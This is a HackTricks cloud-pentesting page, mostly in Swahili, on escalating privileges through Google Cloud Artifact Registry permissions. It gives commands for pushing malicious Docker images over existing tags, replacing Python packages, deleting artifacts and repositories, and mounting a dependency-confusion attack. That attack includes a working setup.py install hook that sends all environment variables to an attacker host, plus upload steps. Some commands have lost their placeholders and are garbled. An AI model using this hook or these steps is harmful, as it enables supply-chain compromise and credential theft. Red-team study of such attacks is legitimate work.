GCP - Artifact Registry Privesc

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Artifact Registry

Kwa taarifa zaidi kuhusu Artifact Registry, angalia:

GCP - Artifact Registry Enum

artifactregistry.repositories.uploadArtifacts

Kwa ruhusa hii mdukuzi anaweza kupakia matoleo mapya ya artifacts yenye malicious code kama Docker images:

Pakia Docker image kwenye Artifact Registry

```bash # Configure docker to use gcloud to authenticate with Artifact Registry gcloud auth configure-docker -docker.pkg.dev

tag the image to upload it

docker tag : -docker.pkg.dev///:

Upload it

docker push -docker.pkg.dev///:

</details>

> [!CAUTION]
> Ilithibitishwa kwamba ni **inawezekana kupakia docker mpya ya hatari** yenye jina na tag sawa na ile iliyokuwepo, hivyo **ile ya zamani itapoteza tag** na mara ijayo picha yenye tag hiyo, **picha hatari ndiyo itakapopakuliwa**.

<details>

<summary>Pakia maktaba ya Python</summary>

**Anza kwa kuunda maktaba ya kupakia** (ikiwa unaweza kupakua toleo la hivi karibuni kutoka registry unaweza kuepuka hatua hii):

1.  **Sanidi muundo wa mradi wako**:

- Unda saraka mpya kwa maktaba yako, kwa mfano, `hello_world_library`.
- Ndani ya saraka hii, unda saraka nyingine yenye jina la kifurushi chako, kwa mfano, `hello_world`.
- Ndani ya saraka ya kifurushi chako, unda faili `__init__.py`. Faili hii inaweza kuwa tupu au inaweza kuwa na uanzishaji wa kifurushi chako.

<details>
<summary>Create project structure</summary>

```bash
mkdir hello_world_library
cd hello_world_library
mkdir hello_world
touch hello_world/__init__.py

Andika msimbo wa maktaba yako:

Ndani ya saraka hello_world, unda faili mpya ya Python kwa moduli yako, kwa mfano, greet.py.
Andika kazi yako ya “Hello, World!”:

Create library module

# hello_world/greet.py
def say_hello():
return "Hello, World!"

Unda faili setup.py:

Katika mizizi ya saraka yako ya hello_world_library, unda faili setup.py.
Faili hii ina metadata kuhusu maktaba yako na inamwambia Python jinsi ya kuiweka.

Create setup.py file

# setup.py
from setuptools import setup, find_packages

setup(
name='hello_world',
version='0.1',
packages=find_packages(),
install_requires=[
# Any dependencies your library needs
],
)

Sasa, pakia maktaba:

Jenga kifurushi chako:

Kutoka mizizi ya saraka yako ya hello_world_library, endesha:

Build Python package

python3 setup.py sdist bdist_wheel

Sanidi uthibitishaji kwa twine (inayotumika kupakia kifurushi chako):

Hakikisha umeweka twine (pip install twine).
Tumia gcloud kusanidi credentials:

Pakia kifurushi kwa twine

```sh twine upload --username 'oauth2accesstoken' --password "$(gcloud auth print-access-token)" --repository-url https://-python.pkg.dev/// dist/* ```

Safisha ujenzi

Safisha artifacts za ujenzi

```bash rm -rf dist build hello_world.egg-info ```

Caution

Haiwezekani kupakia library ya python yenye toleo lile kama ilivyo tayari, lakini inawezekana kupakia matoleo makubwa zaidi (au kuongeza .0 mwishoni wa toleo ikiwa hiyo itafanya kazi - si kwa python ingawa-), au kufuta toleo la mwisho na kupakia jipya (inahitaji artifactregistry.versions.delete):**
Delete artifact version
gcloud artifacts versions delete <version> --repository=<repo-name> --location=<location> --package=<lib-name>

`artifactregistry.repositories.downloadArtifacts`

Kwa ruhusa hii unaweza kupakua artifacts na kutafuta taarifa nyeti na vulnerabilities.

Pakua Docker image:

Pakua Docker image kutoka Artifact Registry

```sh # Configure docker to use gcloud to authenticate with Artifact Registry gcloud auth configure-docker -docker.pkg.dev

Dowload image

docker pull -docker.pkg.dev///:

</details>

Pakua maktaba ya **python**:

<details>
<summary>Pakua maktaba ya Python kutoka Artifact Registry</summary>
```bash
pip install <lib-name> --index-url "https://oauth2accesstoken:$(gcloud auth print-access-token)@<location>-python.pkg.dev/<project-id>/<repo-name>/simple/" --trusted-host <location>-python.pkg.dev --no-cache-dir

Nini kinatokea ikiwa remote na standard registries zimechanganywa ndani ya virtual moja na package inapatikana katika zote mbili? Angalia ukurasa huu:

GCP - Artifact Registry Persistence

`artifactregistry.tags.delete`, `artifactregistry.versions.delete`, `artifactregistry.packages.delete`, (`artifactregistry.repositories.get`, `artifactregistry.tags.get`, `artifactregistry.tags.list`)

Futa artifacts kutoka kwenye registry, kwa mfano docker images:

Delete Docker image from Artifact Registry

```bash # Delete a docker image gcloud artifacts docker images delete -docker.pkg.dev///: ```

`artifactregistry.repositories.delete`

Futa repositori nzima (hata ikiwa ina yaliyomo):

Futa repositori ya Artifact Registry

``` gcloud artifacts repositories delete --location= ```

`artifactregistry.repositories.setIamPolicy`

Mshambuliaji mwenye ruhusa hii anaweza kujipa ruhusa za kutekeleza baadhi ya mashambulizi ya repository yaliyotajwa hapo awali.

Pivoting to other Services through Artifact Registry Read & Write

Cloud Functions

Wakati Cloud Function inapoanzishwa, docker image mpya inasukumwa kwenye Artifact Registry ya project. Nilijaribu kubadilisha image na ile mpya, hata kufuta image ya sasa (na cache image) na hakuna kilichobadilika — Cloud Function iliendelea kufanya kazi. Kwa hivyo, huenda iwezekane kuabusu a Race Condition attack kama ilivyotokea na bucket kubadilisha docker container itakayotekelezwa, lakini kuhariri tu image iliyohifadhiwa haiwezi kumkomba/kuharibu Cloud Function.

App Engine

Ingawa App Engine huunda docker images ndani ya Artifact Registry. Imetestwa kwamba hata ukibadilisha image ndani ya huduma hii na ukifuta instance ya App Engine (hivyo mpya ikitegemezwa) basi msimbo unaotekelezwa haukubadiliki.
Inawezekana kwamba kufanya Race Condition attack kama ilivyo kwa buckets inaweza kuwezekana kuandika upya msimbo unaotekelezwa, lakini hili halikujaribiwa.

`artifactregistry.repositories.update`

Mshambuliaji hahitaji ruhusa maalum za Artifact Registry ili kutumia tatizo hili—inatosha tu kuwa na konfigurisho dhaifu la virtual-repository. Hii hutokea wakati virtual repository inaunganisha remote public repository (mfano, PyPI, npm) na internal repository, na chanzo cha remote kinapokuwa na kipaumbele sawa au kikubwa zaidi. Ikiwa zote zina package yenye jina moja, mfumo huchagua toleo la juu zaidi. Mshambuliaji anahitaji tu kujua jina la package la ndani na kuwa na uwezo wa kuchapisha packages kwenye registry ya umma inayofanana.

Kwa ruhusa ya artifactregistry.repositories.update, mshambuliaji anaweza kubadilisha mipangilio ya upstream ya virtual repository ili kwa makusudi kuunda mpangilio huu hatarishi na kutumia Dependency Confusion kama njia ya kudumu kwa kuingiza packages zenye madhara ambazo developers au mifumo ya CI/CD zinaweza kusakinisha kiotomatiki.

Mshambuliaji anaunda toleo hatari la package ya ndani katika public repository lenye nambari ya toleo ya juu zaidi. Kwa packages za Python, hili linamaanisha kuandaa muundo wa package unaofanana na ule halali.

mkdir /tmp/malicious_package
cd /tmp/malicious_package
PACKAGE_NAME="<package-name>"
mkdir "$PACKAGE_NAME"
touch "$PACKAGE_NAME/__init__.py"

Baadaye faili ya setup.py inaundwa iliyokuwa na msimbo hatarishi ambao utaendeshwa wakati wa usakinishaji. Faili hii lazima iainishe nambari ya toleo inayozidi ile katika private repository.

cat > setup.py << 'EOF'
import setuptools
from setuptools.command.install import install
import os
import urllib.request
import urllib.parse

def malicious_function():
data = dict(os.environ)
encoded_data = urllib.parse.urlencode(data).encode()
url = 'https://<ip-atacante>/exfil'
req = urllib.request.Request(url, data=encoded_data)
urllib.request.urlopen(req)

class AfterInstall(install):
def run(self):
install.run(self)
malicious_function()

setuptools.setup(
name = "<package-name>",
version = "0.1.1",
packages = ["<package-name>"],
cmdclass={'install': AfterInstall},
)
EOF

Jenga paketi na ufute wheel ili kuhakikisha msimbo unatekelezwa wakati wa usakinishaji.

python3 setup.py sdist bdist_wheel
rm dist/<package-name>*.whl

Pakia kifurushi kibaya kwenye repo ya umma (kwa mfano, test.pypi.org kwa Python).

pip install twine
twine upload --repository testpypi dist/*

Wakati mfumo au huduma inaposakinisha kifurushi kwa kutumia virtual repository, itapakua toleo la hatari kutoka public repository badala ya ile halali ya ndani, kwa sababu toleo la hatari lina nambari ya toleo kubwa zaidi na remote repository ina kipaumbele sawa au cha juu.

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.